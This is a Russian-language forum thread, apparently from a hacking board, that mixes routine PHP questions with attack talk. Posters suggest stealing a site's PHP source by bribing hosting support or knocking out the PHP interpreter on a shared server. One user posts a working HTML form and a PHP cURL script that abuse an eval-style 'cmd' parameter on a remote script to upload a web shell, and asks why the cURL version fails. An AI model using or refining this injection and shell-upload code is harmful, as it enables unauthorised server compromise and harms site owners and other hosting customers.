Есть массив: Code: $test[1]="Бля"; $test[4]="Бля-Бля"; $test[6]="Бля-Бля-Бля"; Какой функций можно убрать промежутки между индексом и получить следующие: Code: $test[0]="Бля"; $test[1]="Бля-Бля"; $test[2]="Бля-Бля-Бля"; implode() и explode() не вариант
есть спец.функция. ищи в на офф.сайте в функциях обработки array А вообще создаешь новый массив и в цыкле помещаешь в него по одному значению)
Доброго времени суток, у меня вопрос. Как сохранить php скрипт не выполняя его ? То есть, есть скрипт site.ru/1.php, при его открытии он выдает значение "1", если клацнуть по линку с site.ru/index.php то он выдает значение "2". Так вот мне нужно скопировать (передрать) его без значений, то есть он мне нужен в таком виде в котором он лежит на хосте. права на нем или 644 или 777. Спасибо!
аа. так он хотел исходники получить? почему не возможно удаленно? хоть и не скриптом, но есть 3 варианта: 1. дать $ саппорту сайта 2. убить интерпретатор php 3. убрать .php из разшерений интерпретатора php
Угу. Раньше в isp был такой глюк, можна было отрубить пехешку при добавлении домена, когда сервер апах перегагружался
Какой ты догадливый. Я там регнусь) и сделаю это. пехешка вырубается на всём сервере. сам раньше так делал
на нормальном хостинге серверов может быть штук 30 и если чел регался год назад, то твоя рега попадет на далекий сервер... даже если рега с разницей пару месяцев - все равно не попадешь на его сервак
Появилась проблема - не могу курлом через эвал залить шелл ( PHP: <form action="http://site.ru/script.php?cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=path/to/shell/123.php" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="upload"> </form> Открываю, сабмиччу форму - шелл льется прекрасно PHP: <?php $zapr='http://site.ru/script.php?cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=path/to/shell/123.php'; $curl = curl_init($zapr); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 60); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POSTFIELDS,array("file"=>"@C:\shell.txt")); $res = curl_exec($curl); echo $res; curl_close($curl); ?> А так не льется Что я делаю не так?
Подскажите, что сделать, чтобы в WordPress вместо: "ґСЂР°РІР»СЏ", выводились нормальные символы? ВП стоит на денвере.
Зачем curl? <?php if (file_get_contents("тут запрос с заливкой шелла")) { echo "Удачный запрос"; } else { echo "Фиг-Вам"; } ?>